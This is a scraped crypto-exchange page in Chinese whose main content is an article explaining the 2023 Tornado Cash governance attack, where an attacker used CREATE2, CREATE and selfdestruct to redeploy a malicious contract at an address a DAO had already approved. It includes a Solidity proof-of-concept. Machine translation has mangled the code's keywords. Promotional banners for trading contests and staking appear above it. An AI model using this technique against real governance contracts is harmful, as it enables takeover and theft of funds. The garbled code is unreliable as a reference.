- 話題
55k 熱度
3k 熱度
2k 熱度
336 熱度
94k 熱度
- 置頂
- 「沒有對手?我有話說!」Gate廣場挑戰賽——秀操作贏$2,000,百萬流量加持!
你是下一個明星交易員嗎?
想讓自己的名字閃耀廣場熱搜?想吸引數萬追隨者?百萬流量已就位,就等你來承接!
🎉 雙重豪禮,贏家通喫!
1️⃣ 曬單排行榜獎勵
收益率排名前10的用戶,瓜分 $1,500合約體驗券!巔峯對決等你來戰!
2️⃣ 曬單幸運獎
隨機抽取10位用戶,每人贈送 $50跟單包賠券!即使不是大神,也有機會躺贏!
🎮 參與方式超簡單!
✅ 在 Gate廣場 曬出你的交易戰績,並成爲帶單員!
✨ 發帖要求:
內容必須原創,並帶上 #CopyTrading# 或 #跟单# 標籤
附上 收益率截圖 或 交易卡片,並分享你的 獨家交易心得
嚴禁AI生成虛假交易,一經發現取消資格
觀點犀利、邏輯清晰,乾貨越多越吸粉!
⏰ 活動截止:8月15日 10:00(UTC+8)
【立即發帖】 展現你的王者操作,承接百萬流量,成爲下一個交易傳奇!
💬 還在等什麼?Gate廣場,等你來戰! 💪 - Gate 鏈上賺幣:ETH 挖礦限時高收益!
✅ 年化收益近 5% + 額外獎勵單人額度 1000 ETH
💎 最低 0.00000001 ETH 起投,無贖回期,隨存隨取!
立即上車,穩賺鏈上收益:https://www.gate.com/staking/ETH - Gate 合約開倉激勵計劃火熱上線!零門檻瓜分 50,000 ERA
開倉即有獎,交易越多獎勵越多!
新用戶享 20% 加成!
立即參與:https://www.gate.com/campaigns/1692?pid=X&ch=NGhnNGTf
活動詳情:https://www.gate.com/announcements/article/46429
#Gate # #合约交易 # #ERA# - 👀 家人們,最近你們都攢了多少 Alpha 積分啦?
空投領到了沒?沒搶到也別急,廣場給你整點額外福利!
🎁 曬出你的 Alpha 收益,咱們就送你$200U代幣盲盒獎勵!
🥇 積分最高曬圖用戶 1 名 → $100 代幣盲盒
✨ 積分榜前五優質分享者 5 名 → 各得 $20 代幣盲盒
📍【怎麼玩】
1️⃣ 帶上話題 #晒出我的Alpha积分收益# 發廣場貼
2️⃣ 曬 Alpha 積分截圖 + 一句話總結:“我靠 Gate Alpha 賺了 ____,真的香!”
👉 還可以分享你的攢分技巧、兌換經驗、積分玩法,越乾貨越容易中獎!
📆【活動時間】
8月4日 18:00 - 8月10日 24:00 (UTC+8) - 🎉 #CandyDrop合约挑战# 正式開啓!參與即可瓜分 6 BTC 豪華獎池!
📢 在 Gate 廣場帶話題發布你的合約體驗
🎁 優質貼文用戶瓜分$500 合約體驗金券,20位名額等你上榜!
📅 活動時間:2025 年 8 月 1 日 15:00 - 8 月 15 日 19:00 (UTC+8)
👉 活動連結:https://www.gate.com/candy-drop/detail/BTC-98
敢合約,敢盈利
Tornado治理攻擊:如何同一個地址上部署不同的合約
大概兩週前(5 月20 日),知名混幣協議Tornado Cash 遭受到治理攻擊,黑客獲取到了Tornado Cash的治理合約的控制權(Owner)。
攻擊過程是這樣的:攻擊者先提交了一個“看起來正常”的提案, 待提案通過之後, 銷毀了提案要執行的合約地址, 並在該地址上重新創建了一個攻擊合約。
攻擊過程可以查看SharkTeam 的Tornado.Cash提案攻擊原理分析 [1] 。
這裡攻擊的關鍵是在同一個地址上部署了不同的合約, 這是如何實現的呢?
背景知識
EVM 中有兩個操作碼用來創建合約:CREATE 與CREATE2 。
CREATE 操作碼
當使用new Token() 使用的是CREATE 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(senderAddress, nonce))
創建的合約地址是通過創建者地址 + 創建者Nonce(創建合約的數量)來確定的, 由於Nonce 總是逐步遞增的, 當Nonce 增加時,創建的合約地址總是是不同的。
CREATE2 操作碼
當添加一個salt時new Token{salt: bytes32()}() ,則使用的是CREATE2 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))
創建的合約地址是創建者地址 + 自定義的鹽 + 要部署的智能合約的字節碼, 因此只有相同字節碼和使用相同的鹽值,才可以部署到同一個合約地址上。
那麼如何才能在同一地址如何部署不用的合約?
攻擊手段
攻擊者結合使用Create2 和Create 來創建合約, 如圖:
先用Create2 部署一個合約Deployer , 在Deployer 使用Create 創建目標合約Proposal(用於提案使用)。 Deployer 和Proposal 合約中均有自毀實現(selfdestruct)。
在提案通過後,攻擊者把Deployer 和Proposal 合約銷毀,然後重新用相同的slat創建Deployer , Deployer 字節碼不變,slat 也相同,因此會得到一個和之前相同的Deployer 合約地址, 但此時Deployer 合約的狀態被清空了, nonce 從0 開始,因此可以使用該nonce 創建另一個合約Attack。
攻擊代碼示例
此代碼來自:
// SPDX 許可證標識符:MIT pragma solidity ^0.8.17; 合約 DAO { 結構提案 { 地址目標; 布爾批准; 布爾泰特; } 地址 public owner = msg.sender; Proposal[] 公開提案; 功能批准(地址目標)外部{ require(msg.sender == owner, "未授權"); proposals.push(提案({target: target, approved: true, uted: false})); } 函數 ute(uint256 proposalId) 外部應付款 { 提案存儲提案 = proposals [proposalId] ; 要求(提案。批准,“未批准”); 要求(!proposal.uted,“uted”); proposal.uted = true; (bool ok, ) = proposal.target.delegatecall( abi.encodeWithSignature("uteProposal()") ); require(ok, "委託調用失敗"); } } 合同提案{ 事件日誌(字符串消息); 函數 uteProposal() 外部 { emit Log("DAO 批准的執行代碼"); } 函數 emergencyStop() 外部 { 自毀(應付(地址(0))); } } 合同攻擊{ 事件日誌(字符串消息); 地址公共所有者; 函數 uteProposal() 外部 { emit Log("執行的代碼未被 DAO 批准 :)"); // 例如 - 將 DAO 的所有者設置為攻擊者 owner = msg.sender; } } 合約 DeployerDeployer { 事件日誌(地址地址); 函數部署()外部{ bytes32 salt = keccak256(abi.encode(uint(123))); 地址addr =地址(新部署者{salt:salt}()); 發出日誌(地址); } } 合同部署者{ 事件日誌(地址地址); 函數 deployProposal() 外部 { 地址地址=地址(新提案()); 發出日誌(地址); } 函數 deployAttack() 外部 { 地址地址=地址(新攻擊()); 發出日誌(地址); } 函數 kill() 外部 { 自毀(應付(地址(0))); } }
大家可以使用該代碼自己在Remix 中演練一下。